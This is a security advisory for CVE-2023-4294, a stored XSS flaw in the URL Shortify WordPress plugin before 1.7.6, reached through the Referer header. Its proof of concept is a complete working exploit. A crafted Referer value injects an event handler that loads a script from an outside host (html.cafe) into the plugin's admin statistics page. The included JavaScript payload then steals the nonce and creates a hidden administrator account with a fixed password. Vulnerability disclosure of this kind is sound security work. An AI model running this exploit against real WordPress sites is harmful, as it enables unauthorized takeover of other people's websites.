URL Shortify < 1.7.6 – Unauthenticated Stored XSS via referer header | CVE 2023-4294

Description

The plugin does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link.

Proof of Concept

1. Add a new shortened link in the interface <host>/wp-admin/admin.php?page=us_links&action=new, in this case it will be:
<host>/mr83

2. Prepare a JavaScript code that will automatically add a new user with administrator privileges to the website and host it on an external resource, e.g. html.cafe.

const url = 'https://<host>/wp-admin/user-new.php';fetch(url).then(response => response.text()).then(html => {const parser = new DOMParser();const doc = parser.parseFromString(html, 'text/html');const nonceValue = doc.getElementById('_wpnonce_create-user').value;const requestOptions = {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded'},body: `action=createuser&_wpnonce_create-user=${encodeURIComponent(nonceValue)}&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=administrator&email =a@a.com&first_name=&last_name=&url=&pass1=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&pass2=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&send_user_notification=0&role=admin &ure_other_roles=&createuser =Add+New+User`};return fetch(url, requestOptions);});

3. Send request with a crafted referer header value.

GET /mr83 HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Referer: https://example.com'abc=""onmouseover='var scriptElement=document.createElement(`script`);scriptElement.src=`https://html.cafe/x…d`;document.head .appendChild(scriptElement);
Connection: close

4. Wait for the administrator interaction with the vulnerable "Referer" field in the statistics of the created link.
<host>/wp-admin/admin.php?page=us_links&action=statistics&_wpnonce=5252159b66&id=1

5. Log in to the newly created administrator account.